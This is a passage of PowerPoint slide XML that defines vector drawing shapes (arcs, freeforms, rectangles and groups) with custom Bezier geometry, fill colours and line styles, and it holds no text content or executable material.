                      <a:pt x="6" y="307"/>
                      <a:pt x="19" y="-1"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21600" y="924"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E7EDED"/>
              </a:solidFill>
              <a:ln w="6350">
                <a:solidFill>
                  <a:srgbClr val="6C8F93"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66581" name="Arc 1045">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C7C37A8-B2D5-004F-ADA0-60DE51601424}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1262" y="1936"/>
                <a:ext cx="164" cy="120"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 4477 0 0"/>
                  <a:gd name="G1" fmla="+- 21600 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 0 w 26077"/>
                  <a:gd name="T1" fmla="*/ 469 h 32051"/>
                  <a:gd name="T2" fmla="*/ 23380 w 26077"/>
                  <a:gd name="T3" fmla="*/ 32051 h 32051"/>
                  <a:gd name="T4" fmla="*/ 4477 w 26077"/>
                  <a:gd name="T5" fmla="*/ 21600 h 32051"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="26077" h="32051" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="0" y="469"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1471" y="157"/>
                      <a:pt x="2972" y="0"/>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0"/>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2" name="Arc 1046">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72410690-138A-A54A-9E98-B20F95DA679C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1263" y="1938"/>
                <a:ext cx="161" cy="118"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 4434 0 0"/>
                  <a:gd name="G1" fmla="+- 21600 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 0 w 26034"/>
                  <a:gd name="T1" fmla="*/ 460 h 32133"/>
                  <a:gd name="T2" fmla="*/ 23292 w 26034"/>
                  <a:gd name="T3" fmla="*/ 32133 h 32133"/>
                  <a:gd name="T4" fmla="*/ 4434 w 26034"/>
                  <a:gd name="T5" fmla="*/ 21600 h 32133"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="26034" h="32133" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="-1" y="459"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1458" y="154"/>
                      <a:pt x="2944" y="0"/>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0"/>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sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66583" name="Arc 1047">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{275DA02E-0F91-6E4F-A388-1012E045E85C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1308" y="2056"/>
                <a:ext cx="156" cy="119"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 0 0 0"/>
                  <a:gd name="G1" fmla="+- 16866 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 13494 w 21600"/>
                  <a:gd name="T1" fmla="*/ 0 h 29154"/>
                  <a:gd name="T2" fmla="*/ 17764 w 21600"/>
                  <a:gd name="T3" fmla="*/ 29154 h 29154"/>
                  <a:gd name="T4" fmla="*/ 0 w 21600"/>
                  <a:gd name="T5" fmla="*/ 16866 h 29154"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>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4" name="Arc 1048">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD10871D-0142-0842-83C0-B5EC1844C15E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1308" y="2057"/>
                <a:ext cx="154" cy="117"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 0 0 0"/>
                  <a:gd name="G1" fmla="+- 16931 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 13413 w 21600"/>
                  <a:gd name="T1" fmla="*/ 0 h 29302"/>
                  <a:gd name="T2" fmla="*/ 17707 w 21600"/>
                  <a:gd name="T3" fmla="*/ 29302 h 29302"/>
                  <a:gd name="T4" fmla="*/ 0 w 21600"/>
                  <a:gd name="T5" fmla="*/ 16931 h 29302"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66585" name="Arc 1049">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF5AC388-01D1-EB44-BB83-7C30A4A7FB62}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1257" y="2176"/>
                <a:ext cx="183" cy="172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 7124 0 0"/>
                  <a:gd name="G1" fmla="+- 5992 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 27876 w 28724"/>
                  <a:gd name="T1" fmla="*/ 0 h 27592"/>
                  <a:gd name="T2" fmla="*/ 0 w 28724"/>
                  <a:gd name="T3" fmla="*/ 26383 h 27592"/>
                  <a:gd name="T4" fmla="*/ 7124 w 28724"/>
                  <a:gd name="T5" fmla="*/ 5992 h 27592"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>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6" name="Arc 1050">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{397D1686-447C-5E4D-892C-5602FBD64F59}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1257" y="2176"/>
                <a:ext cx="180" cy="169"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 7122 0 0"/>
                  <a:gd name="G1" fmla="+- 5994 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 27874 w 28722"/>
                  <a:gd name="T1" fmla="*/ 0 h 27594"/>
                  <a:gd name="T2" fmla="*/ 0 w 28722"/>
                  <a:gd name="T3" fmla="*/ 26386 h 27594"/>
                  <a:gd name="T4" fmla="*/ 7122 w 28722"/>
                  <a:gd name="T5" fmla="*/ 5994 h 27594"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66587" name="Arc 1051">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA61487F-B32A-8740-A572-E9E38FDA2445}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="628" y="2055"/>
                <a:ext cx="99" cy="165"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21600 0 0"/>
                  <a:gd name="G1" fmla="+- 21546 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 12768 w 21600"/>
                  <a:gd name="T1" fmla="*/ 41258 h 41258"/>
                  <a:gd name="T2" fmla="*/ 20068 w 21600"/>
                  <a:gd name="T3" fmla="*/ 0 h 41258"/>
                  <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                  <a:gd name="T5" fmla="*/ 21546 h 41258"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21600" h="41258" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="12768" y="41257"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4999" y="37777"/>
                      <a:pt x="0" y="30058"/>
                      <a:pt x="0" y="21546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="10211"/>
                      <a:pt x="8761" y="804"/>
                      <a:pt x="20068" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="21600" h="41258" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="12768" y="41257"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4999" y="37777"/>
                      <a:pt x="0" y="30058"/>
                      <a:pt x="0" y="21546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0"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8" name="Arc 1052">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95D3DE79-CED4-EB48-A299-5AE40F278087}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="630" y="2057"/>
                <a:ext cx="97" cy="161"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21600 0 0"/>
                  <a:gd name="G1" fmla="+- 21546 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 12790 w 21600"/>
                  <a:gd name="T1" fmla="*/ 41268 h 41268"/>
                  <a:gd name="T2" fmla="*/ 20072 w 21600"/>
                  <a:gd name="T3" fmla="*/ 0 h 41268"/>
                  <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                  <a:gd name="T5" fmla="*/ 21546 h 41268"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21600" h="41268" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="12790" y="41267"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5009" y="37792"/>
                      <a:pt x="0" y="30067"/>
                      <a:pt x="0" y="21546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="10209"/>
                      <a:pt x="8763" y="802"/>
                      <a:pt x="20072" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="21600" h="41268" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="12790" y="41267"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5009" y="37792"/>
                      <a:pt x="0" y="30067"/>
                      <a:pt x="0" y="21546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0"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sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66589" name="Arc 1053">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31AADB11-0CA5-7D4B-8FAD-4CD7A124D78D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="890" y="2279"/>
                <a:ext cx="375" cy="100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21206 0 0"/>
                  <a:gd name="G1" fmla="+- 0 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 39085 w 39085"/>
                  <a:gd name="T1" fmla="*/ 12120 h 21600"/>
                  <a:gd name="T2" fmla="*/ 0 w 39085"/>
                  <a:gd name="T3" fmla="*/ 4108 h 21600"/>
                  <a:gd name="T4" fmla="*/ 21206 w 39085"/>
                  <a:gd name="T5" fmla="*/ 0 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="39085" h="21600" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="39085" y="12120"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="35065" y="18049"/>
                      <a:pt x="28368" y="21600"/>
                      <a:pt x="21206" y="21600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10860" y="21600"/>
                      <a:pt x="1967" y="14264"/>
                      <a:pt x="0" y="4107"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="39085" h="21600" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="39085" y="12120"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="35065" y="18049"/>
                      <a:pt x="28368" y="21600"/>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90" name="Arc 1054">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F80C44B-59DD-4D4F-A865-AE16DE541330}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="892" y="2279"/>
                <a:ext cx="370" cy="98"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21198 0 0"/>
                  <a:gd name="G1" fmla="+- 0 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 39018 w 39018"/>
                  <a:gd name="T1" fmla="*/ 12207 h 21600"/>
                  <a:gd name="T2" fmla="*/ 0 w 39018"/>
                  <a:gd name="T3" fmla="*/ 4150 h 21600"/>
                  <a:gd name="T4" fmla="*/ 21198 w 39018"/>
                  <a:gd name="T5" fmla="*/ 0 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="39018" h="21600" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="39017" y="12206"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="34990" y="18085"/>
                      <a:pt x="28323" y="21600"/>
                      <a:pt x="21198" y="21600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10868" y="21600"/>
                      <a:pt x="1984" y="14286"/>
                      <a:pt x="0" y="4149"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="39018" h="21600" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="39017" y="12206"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="34990" y="18085"/>
                      <a:pt x="28323" y="21600"/>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sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66591" name="Freeform 1055">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8405D04-0B5A-4E41-9F70-3F117BD5CBDC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1628" y="398"/>
              <a:ext cx="365" cy="183"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 177 w 1460"/>
                <a:gd name="T1" fmla="*/ 0 h 730"/>
                <a:gd name="T2" fmla="*/ 1460 w 1460"/>
                <a:gd name="T3" fmla="*/ 0 h 730"/>
                <a:gd name="T4" fmla="*/ 726 w 1460"/>
                <a:gd name="T5" fmla="*/ 730 h 730"/>
                <a:gd name="T6" fmla="*/ 0 w 1460"/>
                <a:gd name="T7" fmla="*/ 8 h 730"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1460" h="730">
                  <a:moveTo>
                    <a:pt x="177" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1460" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="8"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="CF0E3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797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="66592" name="Group 1056">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A985B2DF-B023-604F-810A-C44B77EF056B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1927" y="332"/>
              <a:ext cx="171" cy="169"/>
              <a:chOff x="1179" y="1966"/>
              <a:chExt cx="171" cy="169"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66593" name="Freeform 1057">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D107EBF0-0832-7F4B-8B5A-A74E5B76DA3F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1203" y="2068"/>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94" name="Freeform 1058">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CDB0AA1-2D32-0142-A9D4-8B183E74D15B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1205" y="2070"/>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595" name="Rectangle 1059">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC2A61E1-9766-F54C-B1AA-88B8434995A3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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596" name="Rectangle 1060">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EC20B08-A376-094A-B6C4-27E3C61E431C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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597" name="Freeform 1061">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2B6753E-BA98-A649-AB87-E8C01A8FD132}"/>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98" name="Freeform 1062">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47919644-7FF0-0346-B6F7-1DAC4080CFAE}"/>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599" name="Freeform 1063">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2008D2CD-DD6C-7A42-88A5-C21EA154EA92}"/>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0" name="Freeform 1064">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CE9868F-3D31-1341-B323-771A741CBC2F}"/>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601" name="Freeform 1065">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10E9C9FD-BCFE-874B-A35E-7F3388EE1FD4}"/>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2" name="Freeform 1066">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2D72126-876A-2145-841B-D8D5D9A7FB86}"/>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03" name="Rectangle 1067">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59C319E1-E668-C348-AF42-3C53CCD573D8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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04" name="Rectangle 1068">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F7C8AF3-6E99-5746-BC89-6E98C5B71F9C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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605" name="Freeform 1069">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C341C9F-CAA0-0746-ADAC-E4219C2A1366}"/>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6" name="Freeform 1070">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33C750FE-838C-AC41-9923-782EB1F4BDF7}"/>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07" name="Freeform 1071">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5216288-7FC4-034D-97A3-EC7A835FEA98}"/>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8" name="Freeform 1072">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54314932-C1B3-9A41-9562-D3A1B5BEDE72}"/>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09" name="Freeform 1073">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
